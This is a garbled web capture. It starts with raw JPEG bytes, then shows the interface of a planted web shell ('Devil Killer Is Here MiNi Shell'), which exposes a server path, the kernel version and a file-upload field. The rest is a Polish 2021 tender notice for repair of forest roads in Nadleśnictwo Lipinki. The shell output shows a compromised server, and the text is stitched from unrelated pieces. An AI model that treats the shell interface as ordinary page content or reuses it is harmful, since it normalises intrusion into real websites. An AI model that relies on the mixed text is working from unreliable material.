JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210909/0017584601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i konserwacja dróg w Nadleśnictwie Lipinki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lasy Państwowe Nadleśnictwo Lipinki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970040155</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Budowlanych 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lipinki@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lipinki.zielonagora.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i konserwacja dróg w Nadleśnictwie Lipinki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be44239b-1099-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00175846</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00061795/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Utrzymanie i naprawy dróg na terenie Nadleśnictwa Lipinki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/,<br/>ePUAPu https://epuap.gov.pl/wps/portal <br/>oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty<br/>następuje wyłącznie przy użyciu miniPortalu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z<br/>zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniPortalu.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowego<br/>odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w<br/>postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP.<br/>Za datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w<br/>postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty<br/>elektronicznej Zamawiającego lipinki@zielonagora.lasy.gov.pl<br/>Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik nr 8 do niniejszej<br/>SWZ. Dane postępowania można wyszukać również na Liście wszystkich postępowań klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu.<br/>Ze względu na ograniczoną ilość znaków w ogłoszeniu szczegółowe informacje dot. postępowania<br/>znajdują się w SWZ (rozdział 10).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119, str. 1<br/>ze zm. – dalej „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest<br/>Nadleśnictwo Lipinki ul. Budowlanych 21, 68 – 200 Żary, tel. 68 362-62-58, . Z Inspektorem Ochrony<br/>Danych można skontaktować się na adres e-mail: iod@comp-net.pl<br/>2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich<br/>wniesienia.<br/>4. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, po wybraniu Wykonawcy – na podstawie art. 6 ust. 1 lit. b RODO w celu<br/>zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania<br/>postępowania o udzielenie zamówienia i jego archiwizacji.<br/>5. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania<br/>zostanie udostępniona w oparciu o art. 18 – 19 oraz 74 – 76 PZP.<br/>6. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy w<br/>sprawie zamówienia publicznego.<br/>7. Niezależnie od postanowień pkt 1.6. powyżej, w przypadku zawarcia umowy w sprawie zamówienia<br/>publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń<br/>wynikających z umowy w sprawie zamówienia publicznego.<br/>8. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom przetwarzającym dane w imieniu administratora<br/>danych osobowych np. podmiotom świadczącym usługi doradcze, w tym usługi prawne, i<br/>konsultingowe, firmom zapewniającym niszczenie materiałów itp.<br/>Ze względu na ograniczoną ilość znaków szczegółowe inf. zawarte są w dziale 21 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.21.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane, polegające na utrzymaniu (konserwacji) oraz<br/>naprawie (remoncie) dróg na terenie Nadleśnictwa Lipinki z podziałem na części:<br/>CZĘŚĆ/PAKIET I: REMONT I KONSERWACJA DRÓG LEŚNYCH Z WYKORZYSTANIEM<br/>RECYKLERA.<br/>Remont i konserwacja dróg z wykorzystaniem recyklera obejmuje m.in. spulchnienie i<br/>wymieszanie istniejącej górnej warstwy nawierzchni, zagęszczenie mechaniczne nawierzchni,<br/>profilowanie istniejącej nawierzchni, kruszenie warstwy drogi, naprawy poboczy, uzupełnienie<br/>punktowe drogi tłuczniem. w następujących pięciu lokalizacjach tj.:<br/>DP- DROGA SIODŁO-ŻAGAŃ NR INWENTARZOWY 220/482, DP- DROGA DO ZBIORNIKA<br/>RETENCYJNEGO NR INWENTARZOWY 220/2253, DPDROGA LEŚNA KAMIENICA NR<br/>INWENTARZOWY 220/2536, DP- DROGA LEŚNA OLSZYNA-CHEŁMICA NR<br/>INWENTARZOWY 220/464, DP- DROGA SZKÓŁKA LEŚNA NR INWENTARZOWY L30/05/2.<br/>Szczegółowy opis prac wchodzących w skład przedmiotu zamówienia (rodzaj i ilość prac) oraz<br/>szczegółowy opis technologii wykonywania poszczególnych prac wchodzących w skład<br/>przedmiotu zamówienia, zawarty został w załącznikach do SWZ:<br/>nr 9 – specyfikacja techniczna wykonania i odbioru robót,<br/>nr 10 – przedmiar robót,<br/>nr 11 – opis prac remontowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust.<br/>1) pkt 7) PZP - „Zamówienia podobne”. Zamówienia podobne będą polegały na powtórzeniu robót<br/>budowlanych zgodnych z robotami budowlanymi stanowiącymi przedmiot niniejszego zamówienia.<br/>Zakresem rzeczowym robót stanowiących przedmiot Zamówień Podobnych objęte będą roboty z<br/>zakresu konserwacji i remontów dróg, wskazane rodzajowo w załączniku nr 9 do niniejszej SWZ<br/>(STWiOR) i załączniku nr 10 do niniejszej SWZ (przedmiar robót), umiejscowione na obszarze administracyjnym Nadleśnictwa Lipinki. Zakres rzeczowy robót budowlanych stanowiących przedmiot<br/>Zamówień Podobnych, nie przekroczy wartości 50 % wartości niniejszego zamówienia. Zamówienia<br/>Podobne będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia<br/>publicznego w trybie zamówienia z wolnej ręki. Zamówienia Podobne zostaną udzielone pod<br/>warunkiem, że zamawiający będzie posiadał niezbędne środki finansowe. Zamówienia Podobne będą<br/>udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu robót, powierzenia Zamawiającemu<br/>nowych zadań gospodarczych lub publicznych, jak również w sytuacji braku możliwości wyłonienia z<br/>przyczyn obiektywnych wykonawców robót w ramach podstawowych trybów udzielania zamówień,<br/>celem zabezpieczenia niezbędnego wykonawstwa robót oraz w przypadku powierzania wykonawcy<br/>robót stanowiących wykonawstwo zastępcze w stosunku do robót realizowanych przez innego<br/>wykonawcę.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>Kryterium 1 - (C) - Cena oferty – 60 %,<br/>Kryterium 2 – (G) – Długość okresu gwarancji na wykonane roboty – 40%,<br/>gdzie 1% odpowiada 1 pkt.<br/><br/>Sposób dokonania oceny ofert (X): X = C + G<br/>a) Kryterium 1 (C) – cena oferty<br/>C = cmin / cbad x 60 pkt<br/>gdzie:<br/>cmin - najniższa cena brutto spośród ofert ważnych<br/>cbad - cena brutto oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w Formularzu Oferty (zał. nr 1<br/>do SWZ).<br/>b) Kryterium 3 (G) – Długość okresu gwarancji na wykonane roboty<br/>W ramach kryterium – Długość okresu gwarancji na wykonane roboty, oceniane będzie przyjęcie przez<br/>Wykonawcę zobowiązania umownego do udzielenia gwarancji jakości na w/w roboty na okres:<br/>PAKIET I: 36 miesięcy od dnia podpisania końcowego protokołu odbioru robót,<br/>PAKIET II: 36 miesięcy od dnia podpisania końcowego protokołu odbioru robót;<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do realizacji<br/>przedmiotu zamówienia w zakresie niniejszego kryterium w formularzu oferty (zał. nr 1 do SWZ). Brak<br/>wskazania w formularzu Oferty przyjęcia przez Wykonawcę zobowiązania, o którym mowa powyżej<br/>będzie uznawane jako nieprzyjęcie takiego zobowiązania, a oferta uzyska 0 pkt w ramach niniejszego<br/>kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40 pkt.<br/>Nie przyjęcie przez Wykonawcę w/w zobowiązania spowoduje, że okres gwarancji na przedmiot<br/>zamówienia, wynosić będzie odpowiednio 24 miesiące (Pakiet I), 24 miesięcy (Pakiet II), od dnia<br/>podpisania końcowego protokołu odbioru robót.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę<br/>punktów w/w kryteriach oceny ofert w ramach danego Pakietu.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały<br/>taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli<br/>nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający<br/>wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane, polegające na utrzymaniu (konserwacji) oraz<br/>naprawie (remoncie) dróg na terenie Nadleśnictwa Lipinki z podziałem na części:<br/>CZĘŚĆ/PAKIET II: KONSERWACJA DRÓG LEŚNYCH Z WYKORZYSTANIEM KRUSZYWA<br/>ŁAMANEGO I POSPÓŁKI<br/>Konserwacja dróg leśnych z wykorzystaniem kruszywa łamanego i pospółki obejmuje m. in.<br/>profilowanie i zagęszczenie podłoża, roboty ziemne, wykonywanie nawierzchni.<br/>Drogi objęte konserwacją zlokalizowane są w Leśnictwie Suchleb. <br/>Drogi oznaczone są nr inwentarzowymi L30/05/54, L30/05/25.<br/>Szczegółowy opis prac wchodzących w skład przedmiotu zamówienia (rodzaj i ilość prac) oraz<br/>szczegółowy opis technologii wykonywania poszczególnych prac wchodzących w skład<br/>przedmiotu zamówienia, zawarty został w załącznikach do SWZ:<br/>nr 9 – specyfikacja techniczna wykonania i odbioru robót,<br/>nr 10 – przedmiar robót,<br/>nr 11 – opis prac konserwacyjnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust.<br/>1) pkt 7) PZP - „Zamówienia podobne”. Zamówienia podobne będą polegały na powtórzeniu robót<br/>budowlanych zgodnych z robotami budowlanymi stanowiącymi przedmiot niniejszego zamówienia.<br/>Zakresem rzeczowym robót stanowiących przedmiot Zamówień Podobnych objęte będą roboty z zakresu konserwacji i remontów dróg, wskazane rodzajowo w załączniku nr 9 do niniejszej SWZ<br/>(STWiOR) i załączniku nr 10 do niniejszej SWZ (przedmiar robót), umiejscowione na obszarze<br/>administracyjnym Nadleśnictwa Lipinki. Zakres rzeczowy robót budowlanych stanowiących przedmiot<br/>Zamówień Podobnych, nie przekroczy wartości 50 % wartości niniejszego zamówienia. Zamówienia<br/>Podobne będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia<br/>publicznego w trybie zamówienia z wolnej ręki. Zamówienia Podobne zostaną udzielone pod<br/>warunkiem, że zamawiający będzie posiadał niezbędne środki finansowe. Zamówienia Podobne będą<br/>udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu robót, powierzenia Zamawiającemu<br/>nowych zadań gospodarczych lub publicznych, jak również w sytuacji braku możliwości wyłonienia z<br/>przyczyn obiektywnych wykonawców robót w ramach podstawowych trybów udzielania zamówień,<br/>celem zabezpieczenia niezbędnego wykonawstwa robót oraz w przypadku powierzania wykonawcy<br/>robót stanowiących wykonawstwo zastępcze w stosunku do robót realizowanych przez innego<br/>wykonawcę.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>Kryterium 1 - (C) - Cena oferty – 60 %,<br/>Kryterium 2 – (G) – Długość okresu gwarancji na wykonane roboty – 40%,<br/>gdzie 1% odpowiada 1 pkt.<br/><br/>Sposób dokonania oceny ofert (X): X = C + G<br/>a) Kryterium 1 (C) – cena oferty<br/>C = cmin / cbad x 60 pkt<br/>gdzie:<br/>cmin - najniższa cena brutto spośród ofert ważnych<br/>cbad - cena brutto oferty badanej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w Formularzu Oferty (zał. nr 1<br/>do SWZ).<br/>b) Kryterium 3 (G) – Długość okresu gwarancji na wykonane roboty<br/>W ramach kryterium – Długość okresu gwarancji na wykonane roboty, oceniane 